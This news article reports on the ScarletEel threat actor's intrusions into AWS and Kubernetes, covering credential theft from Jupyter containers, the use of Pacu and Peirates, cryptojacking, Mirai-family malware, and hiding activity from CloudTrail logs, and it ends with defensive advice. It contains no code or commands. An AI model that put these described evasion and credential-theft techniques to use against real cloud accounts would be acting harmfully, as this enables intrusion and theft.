A financially motivated threat actor known as ScarletEel has been discovered infiltrating Amazon Web Services (AWS) in order to carry out various malicious activities, including stealing credentials and intellectual property, planting crypto mining software, and launching distributed denial-of-service (DDoS) attacks. These findings were first revealed in a blog post by cloud security firm Sysdig in February.
Sysdig researchers found that ScarletEel is highly knowledgeable about AWS tools, allowing them to easily move within cloud environments using native AWS functionality. They have also become more sophisticated in their tactics over time, evading cloud security detection mechanisms and expanding their arsenal to include DDoS-as-a-service.
The group’s latest intrusion involved exploiting Jupyter notebook containers within a Kubernetes cluster and running scripts to search for AWS credentials that could be sent back to their command-and-control server. The use of built-in shell commands instead of command line tools made their exfiltration techniques more stealthy and harder to detect.
ScarletEel also employed tools like Pacu and Peirates to identify opportunities for privilege escalation and explore and exploit a victim’s Kubernetes environment, respectively. To hide their activity, the hackers used a Russian server that supports the AWS protocol, masking the malicious nature of their actions. This also prevented the activity from being logged in the victim’s AWS CloudTrail logs.
The primary goals of ScarletEel are to steal proprietary software and perform cryptojacking. In their most recent campaign, they dropped 42 instances of cryptominers using a compromised account. Although they were quickly detected and stopped, the attackers persisted by attempting to use new and compromised accounts. However, they were unsuccessful due to a lack of privileges.
If the attack had been allowed to continue, it could have generated approximately $4,000 worth of cryptomining rewards on a daily basis. Additionally, ScarletEel planted malware from the Mirai botnet family called “Pandora,” which could be used for a separate DDoS-as-a-service campaign.
ScarletEel’s ability to infiltrate AWS’s Fargate compute engine demonstrates the challenges faced by traditional cloud security measures. Fargate is not commonly seen as part of the attack surface and is often used for back-end and internal purposes. However, ScarletEel’s activity on Fargate indicates that they are aware of the opportunities it presents and will likely target it in the future.
To defend against sophisticated attackers like ScarletEel, organizations must implement measures to prevent unauthorized access to their environment. However, given the attackers’ increasing sophistication, effective runtime security, cloud security posture management (CSPM), and cloud infrastructure entitlement management (CIEM) are also essential.
“It’s not enough to be protected in one way because the attackers today are really aware,” warns Alessandro Brucato, a threat research engineer for Sysdig. “They can exploit any detail.” The ever-evolving tactics of threat actors like ScarletEel highlight the importance of robust security measures for cloud environments.
In conclusion, ScarletEel’s activities within AWS highlight the need for organizations to prioritize cloud security and deploy comprehensive measures to safeguard their sensitive information and infrastructure. The ongoing evolution of threat actors requires constant vigilance and adaptation in order to effectively protect against potential attacks.